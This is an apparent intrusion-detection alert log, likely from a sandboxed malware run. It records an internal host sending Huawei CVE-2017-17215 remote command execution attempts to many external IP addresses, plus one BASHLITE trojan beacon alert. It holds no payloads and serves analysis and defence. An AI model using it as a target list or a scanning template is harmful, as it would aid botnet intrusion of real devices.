                                            06/14/24-10:44:31.091098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5599837215192.168.2.14156.175.47.199
                                            06/14/24-10:43:50.111197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5553837215192.168.2.14197.32.114.210
                                            06/14/24-10:44:24.934883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4234237215192.168.2.1441.205.233.241
                                            06/14/24-10:44:31.054184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3833637215192.168.2.14197.64.30.69
                                            06/14/24-10:43:39.811710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4199437215192.168.2.14197.162.192.42
                                            06/14/24-10:44:31.056206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4987637215192.168.2.1441.15.64.151
                                            06/14/24-10:43:48.020252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4466637215192.168.2.1441.192.245.207
                                            06/14/24-10:44:24.916832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3954637215192.168.2.1441.32.11.110
                                            06/14/24-10:44:35.179287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4948237215192.168.2.14156.194.247.0
                                            06/14/24-10:43:36.729978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4800437215192.168.2.14156.188.235.22
                                            06/14/24-10:44:33.134889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4960837215192.168.2.14156.2.167.195
                                            06/14/24-10:44:02.381603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754837215192.168.2.14156.105.127.196
                                            06/14/24-10:43:48.045531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373837215192.168.2.1441.139.46.68
                                            06/14/24-10:44:04.424304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457237215192.168.2.1441.245.15.167
                                            06/14/24-10:44:26.980553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5821637215192.168.2.1441.133.72.151
                                            06/14/24-10:44:00.324629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3802237215192.168.2.14156.235.125.214
                                            06/14/24-10:44:06.473507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4640037215192.168.2.14156.179.98.115
                                            06/14/24-10:44:00.339574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5374637215192.168.2.14156.30.30.252
                                            06/14/24-10:44:04.412349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5636437215192.168.2.14156.23.141.234
                                            06/14/24-10:43:37.759486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3483237215192.168.2.14197.191.116.64
                                            06/14/24-10:44:24.913514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5637637215192.168.2.1441.237.14.148
                                            06/14/24-10:44:26.978843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5544637215192.168.2.14156.199.0.236
                                            06/14/24-10:43:50.111774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4258237215192.168.2.14156.17.90.197
                                            06/14/24-10:44:20.804823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4691437215192.168.2.14197.88.165.17
                                            06/14/24-10:44:04.412128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721437215192.168.2.14197.25.71.96
                                            06/14/24-10:44:22.860400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5939437215192.168.2.1441.167.64.181
                                            06/14/24-10:43:52.159323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5378037215192.168.2.14197.124.110.24
                                            06/14/24-10:43:34.679275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5787837215192.168.2.14197.146.24.147
                                            06/14/24-10:43:41.848328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556037215192.168.2.1441.5.202.197
                                            06/14/24-10:44:00.324556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5139037215192.168.2.1441.25.196.22
                                            06/14/24-10:44:12.618104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4158037215192.168.2.14197.4.48.111
                                            06/14/24-10:43:52.149509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641837215192.168.2.14197.239.58.112
                                            06/14/24-10:44:12.641289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542437215192.168.2.14197.242.129.142
                                            06/14/24-10:44:12.641700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233437215192.168.2.1441.166.159.153
                                            06/14/24-10:44:06.469896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5486437215192.168.2.1441.35.165.215
                                            06/14/24-10:44:31.053176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5335237215192.168.2.14197.27.117.197
                                            06/14/24-10:44:06.447992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4481237215192.168.2.14197.155.112.208
                                            06/14/24-10:44:16.718621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5841637215192.168.2.14156.115.92.194
                                            06/14/24-10:44:14.671264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543037215192.168.2.1441.33.218.163
                                            06/14/24-10:44:12.644502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452037215192.168.2.14197.212.30.25
                                            06/14/24-10:43:58.276326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4796037215192.168.2.14197.40.27.31
                                            06/14/24-10:43:48.029141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974237215192.168.2.1441.127.39.212
                                            06/14/24-10:43:48.029408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3413037215192.168.2.14197.81.227.45
                                            06/14/24-10:44:20.806528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4037837215192.168.2.14156.174.234.177
                                            06/14/24-10:44:29.024280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472437215192.168.2.14197.87.211.199
                                            06/14/24-10:44:33.150381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891037215192.168.2.14156.127.66.202
                                            06/14/24-10:44:20.806826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355037215192.168.2.1441.237.76.199
                                            06/14/24-10:43:43.940885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4345437215192.168.2.14197.35.222.83
                                            06/14/24-10:43:41.847454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5555237215192.168.2.1441.173.185.79
                                            06/14/24-10:44:18.760867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6046637215192.168.2.1441.134.58.74
                                            06/14/24-10:44:14.671837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3295037215192.168.2.1441.229.43.66
                                            06/14/24-10:44:24.944692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5761637215192.168.2.14156.197.192.184
                                            06/14/24-10:44:29.014060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3457237215192.168.2.14156.201.107.167
                                            06/14/24-10:44:02.364623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5277037215192.168.2.14197.200.132.189
                                            06/14/24-10:44:06.449731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4496437215192.168.2.14156.153.15.225
                                            06/14/24-10:43:37.762600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5384837215192.168.2.1441.125.41.46
                                            06/14/24-10:44:31.053941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983437215192.168.2.14197.192.41.244
                                            06/14/24-10:43:45.968527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5554637215192.168.2.14156.201.116.41
                                            06/14/24-10:43:52.149626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4239837215192.168.2.1441.238.52.154
                                            06/14/24-10:44:22.858919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5267637215192.168.2.1441.94.118.233
                                            06/14/24-10:43:33.803136TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)4961223192.168.2.1443.231.232.101
                                            06/14/24-10:43:58.289578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300037215192.168.2.14197.75.86.125
                                            06/14/24-10:43:50.111022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3294837215192.168.2.1441.108.53.101
                                            06/14/24-10:43:39.807740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4138637215192.168.2.14197.240.19.5
                                            06/14/24-10:44:04.405275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4185037215192.168.2.14156.244.149.112
                                            06/14/24-10:43:56.224413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4008837215192.168.2.1441.6.232.45
                                            06/14/24-10:44:18.765755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5914437215192.168.2.1441.68.249.202
                                            06/14/24-10:44:31.054440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4267037215192.168.2.14156.188.160.128
                                            06/14/24-10:44:00.320005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5424237215192.168.2.1441.255.214.9
                                            06/14/24-10:44:24.916361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568837215192.168.2.14156.125.57.103
                                            06/14/24-10:44:24.917617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5446037215192.168.2.1441.251.120.67
                                            06/14/24-10:43:39.807300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4105637215192.168.2.1441.154.35.183
                                            06/14/24-10:44:08.503934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699437215192.168.2.14156.215.39.66
                                            06/14/24-10:44:04.410938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4954837215192.168.2.1441.131.127.211
                                            06/14/24-10:44:16.718865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3517637215192.168.2.1441.162.193.246
                                            06/14/24-10:44:02.382742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5390637215192.168.2.14197.37.108.181
                                            06/14/24-10:43:34.662732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4738437215192.168.2.1441.172.243.251
                                            06/14/24-10:44:00.322576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4866037215192.168.2.14197.56.4.135
                                            06/14/24-10:44:12.617293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968037215192.168.2.1441.1.35.113
                                            06/14/24-10:43:34.662245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5192037215192.168.2.1441.65.197.2
                                            06/14/24-10:44:06.451513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3700637215192.168.2.14197.216.253.66
                                            06/14/24-10:43:48.017349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3474637215192.168.2.14156.252.140.2
                                            06/14/24-10:44:00.322160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4628237215192.168.2.14156.108.48.253
                                            06/14/24-10:44:12.643734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4941637215192.168.2.14156.151.112.231
                                            06/14/24-10:43:54.186126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5197037215192.168.2.14156.189.235.75
                                            06/14/24-10:43:37.760725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453037215192.168.2.1441.213.164.181
                                            06/14/24-10:44:02.381026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4746437215192.168.2.1441.0.248.255
                                            06/14/24-10:44:04.424470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968237215192.168.2.14197.160.53.91
                                            06/14/24-10:44:12.644179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819637215192.168.2.14156.7.115.81
                                            06/14/24-10:44:02.381414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4540837215192.168.2.1441.165.20.17
                                            06/14/24-10:43:43.944008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450237215192.168.2.14156.208.52.55
                                            06/14/24-10:43:54.184403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5821237215192.168.2.14197.177.170.106
                                            06/14/24-10:43:36.724456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6065037215192.168.2.14156.22.65.139
                                            06/14/24-10:43:54.184736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473837215192.168.2.1441.3.114.31
                                            06/14/24-10:44:08.504131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813837215192.168.2.1441.173.164.46
                                            06/14/24-10:44:16.735650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5544437215192.168.2.14156.198.2.102
                                            06/14/24-10:44:35.182326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3494037215192.168.2.1441.58.227.164
                                            06/14/24-10:44:22.878094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4908437215192.168.2.1441.46.146.33
                                            06/14/24-10:44:33.148335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484437215192.168.2.14156.51.215.196
                                            06/14/24-10:43:45.985056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5294837215192.168.2.14197.104.176.23
                                            06/14/24-10:43:41.846899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5765237215192.168.2.14156.99.116.246
                                            06/14/24-10:44:04.407590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5849037215192.168.2.14197.20.125.79
                                            06/14/24-10:44:31.052759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022637215192.168.2.1441.115.229.54
                                            06/14/24-10:44:04.424367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928637215192.168.2.14156.28.166.191
                                            06/14/24-10:44:00.338988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4038037215192.168.2.1441.182.249.72
                                            06/14/24-10:44:33.152087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5111637215192.168.2.14156.250.106.205
                                            06/14/24-10:43:45.984483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3747837215192.168.2.14197.148.87.14
                                            06/14/24-10:44:31.082171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3332437215192.168.2.14197.49.198.175
                                            06/14/24-10:44:20.805599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3889037215192.168.2.1441.195.223.68
                                            06/14/24-10:44:35.182154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4168637215192.168.2.1441.212.230.101
                                            06/14/24-10:43:56.244631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5656637215192.168.2.1441.243.217.128
                                            06/14/24-10:44:26.997293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4742837215192.168.2.14197.87.86.82
                                            06/14/24-10:44:29.024153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3296237215192.168.2.14197.209.133.8
                                            06/14/24-10:44:06.452805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921237215192.168.2.1441.218.179.250
                                            06/14/24-10:44:02.383293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5286437215192.168.2.1441.234.181.21
                                            06/14/24-10:43:37.761510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384437215192.168.2.14197.23.213.44
                                            06/14/24-10:44:08.501697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3970037215192.168.2.14156.250.155.20
                                            06/14/24-10:43:36.724899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776237215192.168.2.14156.180.55.148
                                            06/14/24-10:44:06.452672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3800037215192.168.2.14197.145.11.112
                                            06/14/24-10:43:43.969785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063037215192.168.2.14156.71.228.7
                                            06/14/24-10:43:54.183821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5987037215192.168.2.14156.6.82.3
                                            06/14/24-10:43:54.185986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4885437215192.168.2.14156.229.187.47
                                            06/14/24-10:44:22.882040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625237215192.168.2.14197.200.163.163
                                            06/14/24-10:43:48.028157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067637215192.168.2.1441.21.39.31
                                            06/14/24-10:44:26.998451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770237215192.168.2.1441.128.149.155
                                            06/14/24-10:43:45.966975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5986237215192.168.2.14197.251.43.199
                                            06/14/24-10:43:43.971413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4488837215192.168.2.1441.198.15.59
                                            06/14/24-10:43:58.290420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4270837215192.168.2.14156.220.142.228
                                            06/14/24-10:44:31.083350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615237215192.168.2.14156.134.196.236
                                            06/14/24-10:44:29.025460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4958837215192.168.2.14197.167.182.137
                                            06/14/24-10:44:33.131918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5251637215192.168.2.1441.179.42.125
                                            06/14/24-10:44:14.683248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5921437215192.168.2.14197.114.213.155
                                            06/14/24-10:44:35.178109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062237215192.168.2.14156.10.151.155
                                            06/14/24-10:43:56.227634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3318237215192.168.2.14156.57.128.63
                                            06/14/24-10:43:37.761666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511037215192.168.2.14156.78.243.162
                                            06/14/24-10:44:06.451543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5222637215192.168.2.1441.122.59.156
                                            06/14/24-10:44:12.644283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6068037215192.168.2.1441.17.34.113
                                            06/14/24-10:44:33.135084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5934837215192.168.2.14156.182.126.81
                                            06/14/24-10:44:33.151109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4928237215192.168.2.14156.255.95.187
                                            06/14/24-10:44:33.149212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5076237215192.168.2.14197.86.32.96
                                            06/14/24-10:44:08.502801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3932037215192.168.2.14156.195.37.247
                                            06/14/24-10:43:50.114877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5368237215192.168.2.14197.164.73.25
                                            06/14/24-10:44:33.132350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5841237215192.168.2.1441.88.193.223
                                            06/14/24-10:43:39.792122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762437215192.168.2.14156.76.209.128
                                            06/14/24-10:44:14.671625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3404837215192.168.2.14156.43.163.96
                                            06/14/24-10:43:34.679159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5019437215192.168.2.14197.173.194.201
                                            06/14/24-10:44:35.180014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569237215192.168.2.1441.99.89.226
                                            06/14/24-10:44:04.420930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4387437215192.168.2.14156.31.92.242
                                            06/14/24-10:43:54.183732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4681037215192.168.2.14156.115.164.76
                                            06/14/24-10:43:36.701852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5513037215192.168.2.14197.104.194.52
                                            06/14/24-10:44:33.133975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566637215192.168.2.1441.178.32.95
                                            06/14/24-10:43:54.200225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3925637215192.168.2.1441.54.166.165
                                            06/14/24-10:43:50.074308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4689037215192.168.2.14197.122.187.150
                                            06/14/24-10:44:24.933509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3885037215192.168.2.14197.89.187.246
                                            06/14/24-10:44:31.054082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5264037215192.168.2.14197.190.174.128
                                            06/14/24-10:44:04.406619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5531237215192.168.2.14197.98.69.104
                                            06/14/24-10:44:22.862340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4944837215192.168.2.14156.180.233.151
                                            06/14/24-10:44:18.776249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3614237215192.168.2.14156.10.176.70
                                            06/14/24-10:44:04.420611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727637215192.168.2.14156.224.116.191
                                            06/14/24-10:44:16.718186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080837215192.168.2.1441.91.97.34
                                            06/14/24-10:44:29.010288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3386637215192.168.2.14156.127.131.19
                                            06/14/24-10:43:56.242990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5483437215192.168.2.14156.177.125.144
                                            06/14/24-10:44:06.471388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3490837215192.168.2.1441.231.84.145
                                            06/14/24-10:43:52.162293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6051837215192.168.2.1441.51.67.129
                                            06/14/24-10:43:50.073852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5494837215192.168.2.1441.200.203.97
                                            06/14/24-10:44:06.472556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5569037215192.168.2.14156.168.184.78
                                            06/14/24-10:43:39.788788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4895437215192.168.2.14197.62.123.93
                                            06/14/24-10:44:12.614445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3676037215192.168.2.14197.187.166.10
                                            06/14/24-10:44:06.453282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166037215192.168.2.1441.69.198.20
                                            06/14/24-10:44:14.670640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080037215192.168.2.14156.165.145.204
                                            06/14/24-10:44:14.669030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499837215192.168.2.14156.92.254.246
                                            06/14/24-10:44:27.001245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3314637215192.168.2.14197.104.160.232
                                            06/14/24-10:43:43.968611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5509837215192.168.2.14197.206.1.208
                                            06/14/24-10:44:06.470345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348237215192.168.2.14156.140.65.94
                                            06/14/24-10:43:50.074555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4321637215192.168.2.14197.254.126.111
                                            06/14/24-10:43:34.661973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5048837215192.168.2.14197.1.228.185
                                            06/14/24-10:43:58.295708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5609637215192.168.2.14156.69.26.105
                                            06/14/24-10:44:33.131515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819237215192.168.2.1441.232.208.194
                                            06/14/24-10:44:33.131466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4009637215192.168.2.14197.195.102.101
                                            06/14/24-10:44:22.880201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4374437215192.168.2.14156.148.240.203
                                            06/14/24-10:44:35.176785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5288237215192.168.2.14197.64.208.247
                                            06/14/24-10:43:41.907364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4713837215192.168.2.1441.38.204.237
                                            06/14/24-10:43:58.274436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4480837215192.168.2.14156.205.46.95
                                            06/14/24-10:44:00.339842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6069637215192.168.2.1441.243.44.125
                                            06/14/24-10:44:08.503707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5816637215192.168.2.14156.162.120.65
                                            06/14/24-10:43:48.029009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3760437215192.168.2.1441.219.96.117
                                            06/14/24-10:44:16.735971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3397437215192.168.2.14197.29.165.134
                                            06/14/24-10:43:48.020203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5274837215192.168.2.14197.11.73.63
